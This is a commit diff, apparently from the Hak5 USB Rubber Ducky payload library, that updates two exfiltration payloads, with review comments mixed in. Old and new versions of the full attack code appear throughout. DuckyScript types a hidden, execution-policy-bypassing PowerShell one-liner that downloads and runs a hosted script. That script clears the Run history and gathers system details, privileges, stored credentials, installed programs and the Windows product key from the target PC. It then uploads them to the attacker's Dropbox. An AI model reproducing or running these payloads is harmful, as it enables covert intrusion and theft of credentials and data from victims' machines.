Small updates

pull/431/head
Julien M 2024-06-02 13:25:50 +02:00
parent ea737c4c6d
commit 3da90fee4d
6 changed files with 230 additions and 228 deletions


@ -1,48 +1,48 @@
## Windows Privilege Excalibur
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square">
</a>
<a href="#">
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square">
</a>
</p>
This payload sends you a brief user privilege escalation report via Dropbox. Once you have the report, you can perform further privilege escalation analysis, including using the following resources:
|Report Category|Useful Resources|
|-|-|
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|Stored Credentials||
|Installed Programs|[Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com)|
<details>
<summary>Extension operation</summary>
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box.
3. Executes a hosted PowerShell script that performs the following actions:
- Clears the history of the Windows Run menu.
- Prepares a report on target PC user privilege escalation.
- Sends the report to a file in your Dropbox.
</details>
## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox).
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options
|Required extension options|Extension|Data type|Default value|Description|
|-|-|-|-|-|
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
## Contributors
- [@PlumpyTurkey](https://github.com/PlumpyTurkey)
## Windows Privilege Excalibur
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a>
<a href="#">
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.3" src="https://img.shields.io/badge/VERSION-1.3-green?style=for-the-badge">
</a>
</p>
This payload sends you a brief user privilege escalation report via Dropbox. Once you have the report, you can perform further privilege escalation analysis, including using the following resources:
|Report Category|Useful Resources|
|-|-|
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|Stored Credentials||
|Installed Programs|[Exploit Database](https://www.exploit-db.com/) & [Packet Storm](https://packetstormsecurity.com/)|
## Process
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box.
3. Executes a hosted PowerShell script that performs the following actions:
- Clears the history of the Windows Run menu.
- Prepares a report on target PC user privilege escalation.
- Sends the report to a file in your Dropbox.
## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> [!WARNING]
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options
|Required extension options|Extension|Data type|Default value|Description|
|-|-|-|-|-|
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
## Contributors
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
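Review bot: the Useful Resources table still carries an empty cell on the Stored Credentials row (`|Stored Credentials||`); since this hunk already edits the table's links, either point that row at a resource or drop it so the README does not list a category with no guidance. The Prerequisites paragraph also needs a sentence on credential handling: it instructs the user to paste the app key, app secret and refresh token into script.ps1 and serve it from a URL, but does not say that these are long-lived write credentials for the Dropbox app and that anyone who can fetch that URL obtains them, so the hosted copy should be treated as a secret and the refresh token revoked once the payload is retired.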


@ -1,106 +1,107 @@
REM_BLOCK DOCUMENTATION
Title: Windows Privilege Excalibur
Author: PlumpyTurkey
Description: This payload sends you a brief user privilege escalation report via Dropbox.
Target: Windows 10, 11
Version: 1.3
Category: Exfiltration
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION WINDOWS_ONLY
REM VERSION 1.0
REM AUTHOR: Korben
DEFINE #FAILURE_LED TRUE
DEFINE #FAILURE_LED_MODE LED_R
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
IF (($_OS == WINDOWS) == FALSE) THEN
IF_DEFINED_TRUE #FAILURE_LED
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
END_IF_DEFINED
#FAILURE_ATTACKMODE
STOP_PAYLOAD
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
REM_BLOCK DOCUMENTATION
Title: Windows Privilege Excalibur
Author: PlumpyTurkey
Description: This payload sends you a brief user privilege escalation report via Dropbox.
Target: Windows 10, 11
Version: 1.3
Category: Exfiltration
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION WINDOWS_ONLY
REM VERSION 1.0
REM AUTHOR: Korben
DEFINE #FAILURE_LED TRUE
DEFINE #FAILURE_LED_MODE LED_R
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
IF (($_OS == WINDOWS) == FALSE) THEN
IF_DEFINED_TRUE #FAILURE_LED
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
END_IF_DEFINED
#FAILURE_ATTACKMODE
STOP_PAYLOAD
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
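Review bot: the PASSIVE_WINDOWS_DETECT documentation block (`$_OS will be set to WINDOWS or NOT_WINDOWS`) does not match the code beneath it, which assigns `$_OS = #NOT_WINDOWS` with `DEFINE #NOT_WINDOWS 7` and only ever compares `$_OS` against `WINDOWS`; either say in the comment that NOT_WINDOWS is the numeric sentinel 7 or compare against the constant explicitly in the example usage. In RUN_HOSTED_POWERSHELL, `DEFINE #RHP_SCRIPT_URL example.com` is a live placeholder rather than a safe default: if the option is left unset the payload still types an `IWR` against example.com, so the extension's documentation block should state that this option has no default and must be overridden.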


@ -1,49 +1,49 @@
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
$APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox {
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
[CmdletBinding()]
param(
[Parameter(Mandatory = $true)]
[string]$RefreshToken,
[Parameter(Mandatory = $true)]
[string]$AppKey,
[Parameter(Mandatory = $true)]
[string]$AppSecret,
[Parameter(Mandatory = $true)]
[string]$Content,
[string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
)
try {
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token"
"refresh_token" = $RefreshToken
"client_id" = $AppKey
"client_secret" = $AppSecret
}).access_token
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $AccessToken"
"Content-Type" = "application/octet-stream"
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null
}
catch {
Write-Host "An error occurred: $_"
}
}
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
$Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $Report
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
$APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox {
[CmdletBinding()]
param(
[Parameter(Mandatory = $true)]
[string]$Content,
[Parameter(Mandatory = $true)]
[string]$RefreshToken,
[Parameter(Mandatory = $true)]
[string]$AppKey,
[Parameter(Mandatory = $true)]
[string]$AppSecret,
[string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
)
try {
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token";
"refresh_token" = $RefreshToken;
"client_id" = $AppKey;
"client_secret" = $AppSecret
}
).access_token)";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null
}
catch {
Write-Host "An error occurred: $_"
}
}
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
$Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
Send-ToDropbox -Content $Report -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
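Review bot: inlining the OAuth token exchange inside the `Authorization` header expression (`"Bearer $(( Invoke-RestMethod ... ).access_token)"`) loses the check point the previous `$AccessToken` variable provided: if the token response carries no `access_token`, the upload is still sent with a bare `Bearer ` header and fails remotely with an opaque error instead of stopping locally. Keep the token in a variable and return early when it is empty before calling `files/upload`. The hunk also deletes the `#Documentation:` comment from the function; keep a pointer, updated to the codeberg URL the README now uses, since this function is copied from the Ducky-Utilities repository. The semicolons added after the hashtable entries (`"grant_type" = "refresh_token";`) are redundant when each entry sits on its own line and are not used on the untouched `Dropbox-API-Arg` entry.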


@ -2,17 +2,19 @@
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square">
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a>
<a href="#">
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square">
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
</a>
</p>
This payload sends you the target PC's Windows product key via Dropbox.
<details>
<summary>Extension operation</summary>
## Process
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box.
@ -21,14 +23,12 @@ This payload sends you the target PC's Windows product key via Dropbox.
- Recovers Windows product key from target PC.
- Sends the Windows product key of the target PC to a file in your Dropbox.
</details>
## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox).
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
> [!WARNING]
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options
@ -38,4 +38,4 @@ Once you get them, you need to download the "script.ps1" file for this payload a
## Contributors
- [@PlumpyTurkey](https://github.com/PlumpyTurkey)
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)


@ -89,6 +89,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
@ -99,7 +100,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED


@ -3,34 +3,33 @@ $APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox {
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
[CmdletBinding()]
param(
[Parameter(Mandatory = $true)]
[string]$Content,
[Parameter(Mandatory = $true)]
[string]$RefreshToken,
[Parameter(Mandatory = $true)]
[string]$AppKey,
[Parameter(Mandatory = $true)]
[string]$AppSecret,
[Parameter(Mandatory = $true)]
[string]$Content,
[string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
)
try {
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token"
"refresh_token" = $RefreshToken
"client_id" = $AppKey
"grant_type" = "refresh_token";
"refresh_token" = $RefreshToken;
"client_id" = $AppKey;
"client_secret" = $AppSecret
}).access_token
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $AccessToken"
"Content-Type" = "application/octet-stream"
}
).access_token)";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null
}
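Review bot: this hunk repeats by hand the same Send-ToDropbox rewrite made in the Windows-Privilege-Excalibur script.ps1, including the nested token exchange and the removal of the `#Documentation:` comment, so the two copies of the function now have to be kept in sync manually; record in the comment which upstream Ducky-Utilities version the copy was taken from so a later fix lands in both payloads. The same concern applies here: with the token exchange embedded in the header expression, a response without `access_token` produces a bare `Bearer ` header and the upload is still attempted, where the former `$AccessToken` variable allowed an empty-token check before the call.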
@ -39,9 +38,10 @@ function Send-ToDropbox {
}
}
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $ProductKey
Send-ToDropbox -Content $ProductKey -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET